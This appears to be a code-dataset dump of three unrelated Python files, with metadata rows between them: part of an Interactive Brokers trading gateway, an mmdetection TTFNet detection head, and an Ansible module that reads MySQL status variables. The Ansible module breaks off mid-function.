avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
):
"""
Callback of order status update.
"""
super(IbApi, self).orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid = str(orderId)
order = self.orders.get(orderid, None)
order.traded = filled
# To filter PendingCancel status
order_status = STATUS_IB2VT.get(status, None)
if order_status:
order.status = order_status
self.gateway.on_order(copy(order))
def openOrder( # pylint: disable=invalid-name
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
):
"""
Callback when opening new order.
"""
super(IbApi, self).openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid = str(orderId)
order = OrderData(
symbol=ib_contract.conId,
exchange=EXCHANGE_IB2VT.get(
ib_contract.exchange, ib_contract.exchange),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
price=ib_order.lmtPrice,
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue( # pylint: disable=invalid-name
self, key: str, val: str, currency: str, accountName: str
):
"""
Callback of account update.
"""
super(IbApi, self).updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid = f"{accountName}.{currency}"
account = self.accounts.get(accountid, None)
if not account:
account = AccountData(accountid=accountid,
gateway_name=self.gateway_name)
self.accounts[accountid] = account
name = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio( # pylint: disable=invalid-name
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
):
"""
Callback of position update.
"""
super(IbApi, self).updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
if contract.exchange:
exchange = EXCHANGE_IB2VT.get(contract.exchange, None)
elif contract.primaryExchange:
exchange = EXCHANGE_IB2VT.get(contract.primaryExchange, None)
else:
exchange = Exchange.SMART # Use smart routing for default
if not exchange:
msg = f"存在不支持的交易所持仓{contract.conId} {contract.exchange} {contract.primaryExchange}"
self.gateway.write_log(msg)
return
ib_size = contract.multiplier
if not ib_size:
ib_size = 1
price = averageCost / ib_size
pos = PositionData(
symbol=contract.conId,
exchange=exchange,
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str): # pylint: disable=invalid-name
"""
Callback of account update time.
"""
super(IbApi, self).updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails): # pylint: disable=invalid-name
"""
Callback of contract data update.
"""
super(IbApi, self).contractDetails(reqId, contractDetails)
ib_symbol = contractDetails.contract.conId
ib_exchange = contractDetails.contract.exchange
ib_size = contractDetails.contract.multiplier
ib_product = contractDetails.contract.secType
if not ib_size:
ib_size = 1
contract = ContractData(
symbol=ib_symbol,
exchange=EXCHANGE_IB2VT.get(ib_exchange, ib_exchange),
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_product],
size=ib_size,
pricetick=contractDetails.minTick,
net_position=True,
history_data=True,
stop_supported=True,
gateway_name=self.gateway_name,
)
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
): # pylint: disable=invalid-name
"""
Callback of trade data update.
"""
super(IbApi, self).execDetails(reqId, contract, execution)
# today_date = datetime.now().strftime("%Y%m%d")
trade = TradeData(
symbol=contract.conId,
exchange=EXCHANGE_IB2VT.get(contract.exchange, contract.exchange),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
time=datetime.strptime(execution.time, "%Y%m%d %H:%M:%S"),
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str): # pylint: disable=invalid-name
"""
Callback of all sub accountid.
"""
super(IbApi, self).managedAccounts(accountsList)
for account_code in accountsList.split(","):
self.client.reqAccountUpdates(True, account_code)
def historicalData(self, reqId: int, ib_bar: IbBarData):
"""
Callback of history data update.
"""
dt = datetime.strptime(ib_bar.date, "%Y%m%d %H:%M:%S")
bar = BarData(
symbol=self.history_req.symbol,
exchange=self.history_req.exchange,
datetime=dt,
interval=self.history_req.interval,
volume=ib_bar.volume,
open_price=ib_bar.open,
high_price=ib_bar.high,
low_price=ib_bar.low,
close_price=ib_bar.close,
gateway_name=self.gateway_name
)
self.history_buf.append(bar)
def historicalDataEnd(self, reqId: int, start: str, end: str):
"""
Callback of history data finished.
"""
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
def connect(self, host: str, port: int, clientid: int):
"""
Connect to TWS.
"""
if self.status:
return
self.clientid = clientid
self.client.connect(host, port, clientid)
self.thread.start()
self.client.reqCurrentTime()
def close(self):
"""
Disconnect to TWS.
"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所{req.exchange}")
return
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
# Get contract data from TWS.
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe tick data and create tick object buffer.
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所:{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"不支持的价格类型:{req.type}")
return ""
self.orderid += 1
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
ib_order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.totalQuantity = req.volume
if req.type == OrderType.LIMIT:
ib_order.lmtPrice = req.price
elif req.type == OrderType.STOP:
ib_order.auxPrice = req.price
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
def query_history(self, req: HistoryRequest):
""""""
self.history_req = req
self.reqid += 1
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
if req.end:
end = req.end
end_str = end.strftime("%Y%m%d %H:%M:%S")
else:
end = datetime.now()
end_str = ""
delta = end - req.start
days = min(delta.days, 180) # IB only provides 6-month data
duration = f"{days} D"
bar_size = INTERVAL_VT2IB[req.interval]
if req.exchange == Exchange.IDEALPRO:
bar_type = "MIDPOINT"
else:
bar_type = "TRADES"
self.client.reqHistoricalData(
self.reqid,
ib_contract,
end_str,
duration,
bar_size,
bar_type,
1,
1,
False,
[]
)
self.history_condition.acquire() # Wait for async data return
self.history_condition.wait()
self.history_condition.release()
history = self.history_buf
self.history_buf = [] # Create new buffer list
self.history_req = None
return history
class IbClient(EClient):
""""""
def run(self):
"""
Reimplement the original run message loop of eclient.
Remove all unnecessary try...catch... and allow exceptions to interrupt loop.
"""
while not self.done and self.isConnected():
try:
text = self.msg_queue.get(block=True, timeout=0.2)
if len(text) > MAX_MSG_LEN:
errorMsg = "%s:%d:%s" % (BAD_LENGTH.msg(), len(text), text)
self.wrapper.error(
NO_VALID_ID, BAD_LENGTH.code(), errorMsg
)
self.disconnect()
break
fields = comm.read_fields(text)
self.decoder.interpret(fields)
except Empty:
pass
| 27.64465 | 108 | 0.583648 |
795bb4b7b49ee5a3f7a2c0da10bb448cc7de9b41 | 20,968 | py | Python | mmdet/models/dense_heads/ttf_head.py | NceBoy/mmd_nce | 47223e88661701a87413136d572f1a56d05d0f03 | [
"Apache-2.0"
] | null | null | null | mmdet/models/dense_heads/ttf_head.py | NceBoy/mmd_nce | 47223e88661701a87413136d572f1a56d05d0f03 | [
"Apache-2.0"
] | null | null | null | mmdet/models/dense_heads/ttf_head.py | NceBoy/mmd_nce | 47223e88661701a87413136d572f1a56d05d0f03 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import normal_init, kaiming_init
import numpy as np
from mmcv.ops import ModulatedDeformConv2dPack as ModulatedDeformConvPack
from mmdet.core import multi_apply, calc_region
from mmcv.runner import force_fp32
from mmdet.models.losses import ct_focal_loss, giou_loss_ct
from mmcv.cnn import (build_norm_layer, bias_init_with_prob, ConvModule)
from .anchor_head import AnchorHead
from ..builder import HEADS, build_loss
@HEADS.register_module()
class TTFHead(AnchorHead):
def __init__(self,
inplanes=(64, 128, 256, 512),
planes=(256, 128, 64),
use_dla=False,
base_down_ratio=32,
head_conv=256,
wh_conv=64,
hm_head_conv_num=2,
wh_head_conv_num=2,
num_classes=81,
shortcut_kernel=3,
norm_cfg=dict(type='BN'),
shortcut_cfg=(1, 2, 3),
wh_offset_base=16.,
wh_area_process='log',
wh_agnostic=True,
wh_gaussian=True,
alpha=0.54,
beta=0.54,
hm_weight=1.,
wh_weight=5.,
max_objs=128,
train_cfg=None,
test_cfg=None):
super(AnchorHead, self).__init__()
assert len(planes) in [2, 3, 4]
assert wh_area_process in [None, 'norm', 'log', 'sqrt']
self.planes = planes
self.use_dla = use_dla
self.head_conv = head_conv
self.num_classes = num_classes
self.wh_offset_base = wh_offset_base
self.wh_area_process = wh_area_process
self.wh_agnostic = wh_agnostic
self.wh_gaussian = wh_gaussian
self.alpha = alpha
self.beta = beta
self.hm_weight = hm_weight
self.wh_weight = wh_weight
self.max_objs = max_objs
self.fp16_enabled = False
self.down_ratio = base_down_ratio // 2 ** len(planes)
self.num_fg = num_classes
self.wh_planes = 4 if wh_agnostic else 4 * self.num_fg
self.base_loc = None
self.regloss = giou_loss_ct
# repeat upsampling n times. 32x to 4x by default.
if not self.use_dla:
shortcut_num = min(len(inplanes) - 1, len(planes))
assert shortcut_num == len(shortcut_cfg)
self.deconv_layers = nn.ModuleList([
self.build_upsample(inplanes[-1], planes[0], norm_cfg=norm_cfg),
self.build_upsample(planes[0], planes[1], norm_cfg=norm_cfg)
])
for i in range(2, len(planes)):
self.deconv_layers.append(
self.build_upsample(planes[i - 1], planes[i], norm_cfg=norm_cfg))
padding = (shortcut_kernel - 1) // 2
self.shortcut_layers = self.build_shortcut(
inplanes[:-1][::-1][:shortcut_num], planes[:shortcut_num], shortcut_cfg,
kernel_size=shortcut_kernel, padding=padding)
# heads
self.wh = self.build_head(self.wh_planes, wh_head_conv_num, wh_conv)
self.hm = self.build_head(self.num_fg, hm_head_conv_num)
def _init_layers(self):
pass
def build_shortcut(self,
inplanes,
planes,
shortcut_cfg,
kernel_size=3,
padding=1):
assert len(inplanes) == len(planes) == len(shortcut_cfg)
shortcut_layers = nn.ModuleList()
for (inp, outp, layer_num) in zip(
inplanes, planes, shortcut_cfg):
assert layer_num > 0
layer = ShortcutConv2d(
inp, outp, [kernel_size] * layer_num, [padding] * layer_num)
shortcut_layers.append(layer)
return shortcut_layers
def build_upsample(self, inplanes, planes, norm_cfg=None):
# mdcn = ModulatedDeformConvPack(inplanes, planes, 3, stride=1,
# padding=1, dilation=1, deformable_groups=1)
mdcn = nn.Conv2d(inplanes, planes, 3, stride=1,
padding=1, dilation=1)
up = nn.UpsamplingBilinear2d(scale_factor=2)
layers = []
layers.append(mdcn)
if norm_cfg:
layers.append(build_norm_layer(norm_cfg, planes)[1])
layers.append(nn.ReLU(inplace=True))
layers.append(up)
return nn.Sequential(*layers)
def build_head(self, out_channel, conv_num=1, head_conv_plane=None): #head_conv_plane=64 conv_num=2 out_channel=4
head_convs = []
head_conv_plane = self.head_conv if not head_conv_plane else head_conv_plane
for i in range(conv_num):
inp = self.planes[-1] if i == 0 else head_conv_plane
head_convs.append(ConvModule(inp, head_conv_plane, 3, padding=1))
inp = self.planes[-1] if conv_num <= 0 else head_conv_plane
head_convs.append(nn.Conv2d(inp, out_channel, 1))
return nn.Sequential(*head_convs)
def init_weights(self):
if not self.use_dla:
for _, m in self.shortcut_layers.named_modules():
if isinstance(m, nn.Conv2d):
kaiming_init(m)
if not self.use_dla:
for _, m in self.deconv_layers.named_modules():
if isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
for _, m in self.hm.named_modules():
if isinstance(m, nn.Conv2d):
normal_init(m, std=0.01)
bias_cls = bias_init_with_prob(0.01)
normal_init(self.hm[-1], std=0.01, bias=bias_cls)
for _, m in self.wh.named_modules():
if isinstance(m, nn.Conv2d):
normal_init(m, std=0.001)
def forward(self, feats, onnx=False):
"""
Args:
feats: list(tensor).
Returns:
hm: tensor, (batch, 80, h, w).
wh: tensor, (batch, 4, h, w) or (batch, 80 * 4, h, w).
"""
x = feats[-1]
if not self.use_dla:
for i, upsample_layer in enumerate(self.deconv_layers):
x = upsample_layer(x)
if i < len(self.shortcut_layers):
shortcut = self.shortcut_layers[i](feats[-i - 2])
x = x + shortcut
hm = self.hm(x)
# wh = F.relu(self.wh(x)) * self.wh_offset_base
wh = F.relu(self.wh(x))
if onnx:
hm = F.sigmoid(hm)
return hm, wh
@force_fp32(apply_to=('pred_heatmap', 'pred_wh'))
def get_bboxes(self,
pred_heatmap,
pred_wh,
img_metas,
cfg=None,
rescale=False):
batch, cat, height, width = pred_heatmap.size()
pred_heatmap = pred_heatmap.detach().sigmoid_()
wh = pred_wh.detach()
# perform nms on heatmaps
heat = self.simple_nms(pred_heatmap) # used maxpool to filter the max score
topk = getattr(cfg, 'max_per_img', 100)
# (batch, topk)
scores, inds, clses, ys, xs = self._topk(heat, topk=topk)
xs = xs.view(batch, topk, 1) * self.down_ratio
ys = ys.view(batch, topk, 1) * self.down_ratio
wh = wh.permute(0, 2, 3, 1).contiguous()
wh = wh.view(wh.size(0), -1, wh.size(3))
inds = inds.unsqueeze(2).expand(inds.size(0), inds.size(1), wh.size(2))
wh = wh.gather(1, inds)
if not self.wh_agnostic:
wh = wh.view(-1, topk, self.num_fg, 4)
wh = torch.gather(wh, 2, clses[..., None, None].expand(
clses.size(0), clses.size(1), 1, 4).long())
wh = wh.view(batch, topk, 4)
clses = clses.view(batch, topk, 1).float()
scores = scores.view(batch, topk, 1)
bboxes = torch.cat([xs - wh[..., [0]], ys - wh[..., [1]],
xs + wh[..., [2]], ys + wh[..., [3]]], dim=2)
result_list = []
score_thr = getattr(cfg, 'score_thr', 0.01)
for batch_i in range(bboxes.shape[0]):
scores_per_img = scores[batch_i]
scores_keep = (scores_per_img > score_thr).squeeze(-1)
scores_per_img = scores_per_img[scores_keep]
bboxes_per_img = bboxes[batch_i][scores_keep]
labels_per_img = clses[batch_i][scores_keep]
img_shape = img_metas[batch_i]['pad_shape']
bboxes_per_img[:, 0::2] = bboxes_per_img[:, 0::2].clamp(min=0, max=img_shape[1] - 1)
bboxes_per_img[:, 1::2] = bboxes_per_img[:, 1::2].clamp(min=0, max=img_shape[0] - 1)
if rescale:
scale_factor = img_metas[batch_i]['scale_factor']
bboxes_per_img /= bboxes_per_img.new_tensor(scale_factor)
bboxes_per_img = torch.cat([bboxes_per_img, scores_per_img], dim=1)
labels_per_img = labels_per_img.squeeze(-1)
result_list.append((bboxes_per_img, labels_per_img))
return result_list
@force_fp32(apply_to=('pred_heatmap', 'pred_wh'))
def loss(self,
pred_heatmap,
pred_wh,
gt_bboxes,
gt_labels,
img_metas,
cfg=None,
gt_bboxes_ignore=None):
all_targets = self.target_generator(gt_bboxes, gt_labels, img_metas)
hm_loss, wh_loss = self.loss_calc(pred_heatmap, pred_wh, *all_targets)
return {'losses/ttfnet_loss_heatmap': hm_loss, 'losses/ttfnet_loss_wh': wh_loss}
def _topk(self, scores, topk):
batch, cat, height, width = scores.size()
# both are (batch, 80, topk)
topk_scores, topk_inds = torch.topk(scores.view(batch, cat, -1), topk)
topk_inds = topk_inds % (height * width)
topk_ys = (topk_inds / width).int().float()
topk_xs = (topk_inds % width).int().float()
# both are (batch, topk). select topk from 80*topk
topk_score, topk_ind = torch.topk(topk_scores.view(batch, -1), topk)
topk_clses = (topk_ind / topk).int()
topk_ind = topk_ind.unsqueeze(2)
topk_inds = topk_inds.view(batch, -1, 1).gather(1, topk_ind).view(batch, topk)
topk_ys = topk_ys.view(batch, -1, 1).gather(1, topk_ind).view(batch, topk)
topk_xs = topk_xs.view(batch, -1, 1).gather(1, topk_ind).view(batch, topk)
return topk_score, topk_inds, topk_clses, topk_ys, topk_xs
def gaussian_2d(self, shape, sigma_x=1, sigma_y=1):
m, n = [(ss - 1.) / 2. for ss in shape]
y, x = np.ogrid[-m:m + 1, -n:n + 1]
h = np.exp(-(x * x / (2 * sigma_x * sigma_x) + y * y / (2 * sigma_y * sigma_y)))
h[h < np.finfo(h.dtype).eps * h.max()] = 0
return h
def draw_truncate_gaussian(self, heatmap, center, h_radius, w_radius, k=1):
h, w = 2 * h_radius + 1, 2 * w_radius + 1
sigma_x = w / 6
sigma_y = h / 6
gaussian = self.gaussian_2d((h, w), sigma_x=sigma_x, sigma_y=sigma_y)
gaussian = heatmap.new_tensor(gaussian)
x, y = int(center[0]), int(center[1])
height, width = heatmap.shape[0:2]
left, right = min(x, w_radius), min(width - x, w_radius + 1)
top, bottom = min(y, h_radius), min(height - y, h_radius + 1)
masked_heatmap = heatmap[y - top:y + bottom, x - left:x + right]
masked_gaussian = gaussian[h_radius - top:h_radius + bottom,
w_radius - left:w_radius + right]
if min(masked_gaussian.shape) > 0 and min(masked_heatmap.shape) > 0:
torch.max(masked_heatmap, masked_gaussian * k, out=masked_heatmap)
return heatmap
def bbox_areas(self, bboxes, keep_axis=False):
x_min, y_min, x_max, y_max = bboxes[:, 0], bboxes[:, 1], bboxes[:, 2], bboxes[:, 3]
areas = (y_max - y_min + 1) * (x_max - x_min + 1)
if keep_axis:
return areas[:, None]
return areas
def target_single_image(self, gt_boxes, gt_labels, feat_shape):
"""
Args:
gt_boxes: tensor, tensor <=> img, (num_gt, 4).
gt_labels: tensor, tensor <=> img, (num_gt,).
feat_shape: tuple.
Returns:
heatmap: tensor, tensor <=> img, (80, h, w).
box_target: tensor, tensor <=> img, (4, h, w) or (80 * 4, h, w).
reg_weight: tensor, same as box_target
"""
output_h, output_w = feat_shape
heatmap_channel = self.num_fg
heatmap = gt_boxes.new_zeros((heatmap_channel, output_h, output_w))
fake_heatmap = gt_boxes.new_zeros((output_h, output_w))
box_target = gt_boxes.new_ones((self.wh_planes, output_h, output_w)) * -1
reg_weight = gt_boxes.new_zeros((self.wh_planes // 4, output_h, output_w))
if self.wh_area_process == 'log':
boxes_areas_log = self.bbox_areas(gt_boxes).log()
elif self.wh_area_process == 'sqrt':
boxes_areas_log = self.bbox_areas(gt_boxes).sqrt()
else:
boxes_areas_log = self.bbox_areas(gt_boxes)
boxes_area_topk_log, boxes_ind = torch.topk(boxes_areas_log, boxes_areas_log.size(0))
if self.wh_area_process == 'norm':
boxes_area_topk_log[:] = 1.
gt_boxes = gt_boxes[boxes_ind]
gt_labels = gt_labels[boxes_ind]
feat_gt_boxes = gt_boxes / self.down_ratio
feat_gt_boxes[:, [0, 2]] = torch.clamp(feat_gt_boxes[:, [0, 2]], min=0,
max=output_w - 1)
feat_gt_boxes[:, [1, 3]] = torch.clamp(feat_gt_boxes[:, [1, 3]], min=0,
max=output_h - 1)
feat_hs, feat_ws = (feat_gt_boxes[:, 3] - feat_gt_boxes[:, 1],
feat_gt_boxes[:, 2] - feat_gt_boxes[:, 0])
# we calc the center and ignore area based on the gt-boxes of the origin scale
# no peak will fall between pixels
ct_ints = (torch.stack([(gt_boxes[:, 0] + gt_boxes[:, 2]) / 2,
(gt_boxes[:, 1] + gt_boxes[:, 3]) / 2],
dim=1) / self.down_ratio).to(torch.int)
h_radiuses_alpha = (feat_hs / 2. * self.alpha).int()
w_radiuses_alpha = (feat_ws / 2. * self.alpha).int()
if self.wh_gaussian and self.alpha != self.beta:
h_radiuses_beta = (feat_hs / 2. * self.beta).int()
w_radiuses_beta = (feat_ws / 2. * self.beta).int()
if not self.wh_gaussian:
# calculate positive (center) regions
r1 = (1 - self.beta) / 2
ctr_x1s, ctr_y1s, ctr_x2s, ctr_y2s = calc_region(gt_boxes.transpose(0, 1), r1)
ctr_x1s, ctr_y1s, ctr_x2s, ctr_y2s = [torch.round(x.float() / self.down_ratio).int()
for x in [ctr_x1s, ctr_y1s, ctr_x2s, ctr_y2s]]
ctr_x1s, ctr_x2s = [torch.clamp(x, max=output_w - 1) for x in [ctr_x1s, ctr_x2s]]
ctr_y1s, ctr_y2s = [torch.clamp(y, max=output_h - 1) for y in [ctr_y1s, ctr_y2s]]
# larger boxes have lower priority than small boxes.
for k in range(boxes_ind.shape[0]):
cls_id = gt_labels[k] - 1
fake_heatmap = fake_heatmap.zero_()
self.draw_truncate_gaussian(fake_heatmap, ct_ints[k],
h_radiuses_alpha[k].item(), w_radiuses_alpha[k].item())
heatmap[cls_id] = torch.max(heatmap[cls_id], fake_heatmap)
if self.wh_gaussian:
if self.alpha != self.beta:
fake_heatmap = fake_heatmap.zero_()
self.draw_truncate_gaussian(fake_heatmap, ct_ints[k],
h_radiuses_beta[k].item(),
w_radiuses_beta[k].item())
box_target_inds = fake_heatmap > 0
else:
ctr_x1, ctr_y1, ctr_x2, ctr_y2 = ctr_x1s[k], ctr_y1s[k], ctr_x2s[k], ctr_y2s[k]
box_target_inds = torch.zeros_like(fake_heatmap, dtype=torch.uint8)
box_target_inds[ctr_y1:ctr_y2 + 1, ctr_x1:ctr_x2 + 1] = 1
if self.wh_agnostic:
box_target[:, box_target_inds] = gt_boxes[k][:, None]
cls_id = 0
else:
box_target[(cls_id * 4):((cls_id + 1) * 4), box_target_inds] = gt_boxes[k][:, None]
if self.wh_gaussian:
local_heatmap = fake_heatmap[box_target_inds]
ct_div = local_heatmap.sum()
local_heatmap *= boxes_area_topk_log[k]
reg_weight[cls_id, box_target_inds] = local_heatmap / ct_div
else:
reg_weight[cls_id, box_target_inds] = \
boxes_area_topk_log[k] / box_target_inds.sum().float()
return heatmap, box_target, reg_weight
def simple_nms(self, heat, kernel=3, out_heat=None):
pad = (kernel - 1) // 2
hmax = nn.functional.max_pool2d(heat, (kernel, kernel), stride=1, padding=pad)
keep = (hmax == heat).float()
out_heat = heat if out_heat is None else out_heat
return out_heat * keep
def target_generator(self, gt_boxes, gt_labels, img_metas):
"""
Args:
gt_boxes: list(tensor). tensor <=> image, (gt_num, 4).
gt_labels: list(tensor). tensor <=> image, (gt_num,).
img_metas: list(dict).
Returns:
heatmap: tensor, (batch, 80, h, w).
box_target: tensor, (batch, 4, h, w) or (batch, 80 * 4, h, w).
reg_weight: tensor, same as box_target.
"""
with torch.no_grad():
feat_shape = (img_metas[0]['pad_shape'][0] // self.down_ratio,
img_metas[0]['pad_shape'][1] // self.down_ratio)
heatmap, box_target, reg_weight = multi_apply(
self.target_single_image,
gt_boxes,
gt_labels,
feat_shape=feat_shape
)
heatmap, box_target = [torch.stack(t, dim=0).detach() for t in [heatmap, box_target]]
reg_weight = torch.stack(reg_weight, dim=0).detach()
return heatmap, box_target, reg_weight
def loss_calc(self,
pred_hm,
pred_wh,
heatmap,
box_target,
wh_weight):
"""
Args:
pred_hm: tensor, (batch, 80, h, w).
pred_wh: tensor, (batch, 4, h, w) or (batch, 80 * 4, h, w).
heatmap: tensor, same as pred_hm.
box_target: tensor, same as pred_wh.
wh_weight: tensor, same as pred_wh.
Returns:
hm_loss
wh_loss
"""
H, W = pred_hm.shape[2:]
pred_hm = torch.clamp(pred_hm.sigmoid_(), min=1e-4, max=1 - 1e-4)
hm_loss = ct_focal_loss(pred_hm, heatmap) * self.hm_weight
mask = wh_weight.view(-1, H, W)
avg_factor = mask.sum() + 1e-4
if self.base_loc is None or H != self.base_loc.shape[1] or W != self.base_loc.shape[2]:
base_step = self.down_ratio
shifts_x = torch.arange(0, (W - 1) * base_step + 1, base_step,
dtype=torch.float32, device=heatmap.device)
shifts_y = torch.arange(0, (H - 1) * base_step + 1, base_step,
dtype=torch.float32, device=heatmap.device)
shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)
self.base_loc = torch.stack((shift_x, shift_y), dim=0) # (2, h, w)
# (batch, h, w, 4)
pred_boxes = torch.cat((self.base_loc - pred_wh[:, [0, 1]],
self.base_loc + pred_wh[:, [2, 3]]), dim=1).permute(0, 2, 3, 1)
# (batch, h, w, 4)
boxes = box_target.permute(0, 2, 3, 1)
wh_loss = self.regloss(pred_boxes, boxes, mask, avg_factor=avg_factor) * self.wh_weight
return hm_loss, wh_loss
class ShortcutConv2d(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_sizes,
paddings,
activation_last=False):
super(ShortcutConv2d, self).__init__()
assert len(kernel_sizes) == len(paddings)
layers = []
for i, (kernel_size, padding) in enumerate(zip(kernel_sizes, paddings)):
inc = in_channels if i == 0 else out_channels
layers.append(nn.Conv2d(inc, out_channels, kernel_size, padding=padding))
if i < len(kernel_sizes) - 1 or activation_last:
layers.append(nn.ReLU(inplace=True))
self.layers = nn.Sequential(*layers)
def forward(self, x):
y = self.layers(x)
return y
| 40.168582 | 118 | 0.557135 |
795bb4eb9500b54661e8c101d43230713a7565c9 | 4,498 | py | Python | ansible/galera-operator/ansible/library/mysql_status.py | canghai908/operator-sdk-samples | ddcf4086d52f2bcbc79d6269eb9fb0ee795494d3 | [
"Apache-2.0"
] | null | null | null | ansible/galera-operator/ansible/library/mysql_status.py | canghai908/operator-sdk-samples | ddcf4086d52f2bcbc79d6269eb9fb0ee795494d3 | [
"Apache-2.0"
] | null | null | null | ansible/galera-operator/ansible/library/mysql_status.py | canghai908/operator-sdk-samples | ddcf4086d52f2bcbc79d6269eb9fb0ee795494d3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2018, James Cammarata <jimi@sngx.net>
# Copied and modified mainly from the mysql_variables.py module.
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: mysql_status
short_description: Get MySQL status variables.
description:
- Query MySQL status variables
version_added: 2.8
author: "James Cammarata"
options:
status:
description:
- Variable name to operate
required: True
extends_documentation_fragment: mysql
'''
EXAMPLES = '''
# Get Galera cluster size
- mysql_status:
status: wsrep_cluster_size
# Get all wsrep status variables
- mysql_status:
status: "%wsrep%"
'''
import json
import os
import warnings
from re import match
try:
import MySQLdb
except ImportError:
mysqldb_found = False
else:
mysqldb_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.database import SQLParseError, mysql_quote_identifier
from ansible.module_utils.mysql import mysql_connect, mysqldb_found
from ansible.module_utils._text import to_native
def typedvalue(value):
"""
Convert value to number whenever possible, return same value
otherwise.
>>> typedvalue('3')
3
>>> typedvalue('3.0')
3.0
>>> typedvalue('foobar')
'foobar'
"""
try:
return int(value)
except ValueError:
pass
try:
return float(value)
except ValueError:
pass
return value
def getstatus(cursor, status_name):
if 1: #try:
cursor.execute("SHOW STATUS LIKE %s", (status_name,))
mysqlstatus_res = cursor.fetchall()
return mysqlstatus_res
#except:
# # FIXME: proper error handling here
# return None
def main():
module = AnsibleModule(
argument_spec=dict(
status=dict(default=None, type='list', required=True),
login_user=dict(default=None),
login_password=dict(default=None, no_log=True),
login_host=dict(default="localhost"),
login_port=dict(default=3306, type='int'),
login_unix_socket=dict(default=None),
ssl_cert=dict(default=None),
ssl_key=dict(default=None),
ssl_ca=dict(default=None),
connect_timeout=dict(default=30, type='int'),
config_file=dict(default="~/.my.cnf", type="path")
)
)
user = module.params["login_user"]
password = module.params["login_password"]
ssl_cert = module.params["ssl_cert"]
ssl_key = module.params["ssl_key"]
ssl_ca = module.params["ssl_ca"]
connect_timeout = module.params['connect_timeout']
config_file = module.params['config_file']
db = 'mysql'
mysqlstatus = module.params["status"]
if not mysqldb_found:
module.fail_json(msg="The MySQL-python module is required.")
else:
warnings.filterwarnings('error', category=MySQLdb.Warning)
try:
cursor = mysql_connect(
module,
user,
password,
config_file,
ssl_cert,
ssl_key,
ssl_ca,
connect_timeout=connect_timeout,
)
except Exception as e:
if os.path.exists(config_file):
module.fail_json(msg="unable to connect to database, check login_user and login_password are correct or %s has the credentials. "
"Exception message: %s" % (config_file, to_native(e)))
else:
module.fail_json(msg="unable to find %s. Exception message: %s" % (config_file, to_native(e)))
statuses = {}
for status in mysqlstatus:
if match('^[0-9a-z_\%]+$', status) is None:
module.fail_json(msg="invalid status name \"%s\"" % status)
mysqlstatus_res = getstatus(cursor, status)
if mysqlstatus_res is None:
statuses[status] = None
else:
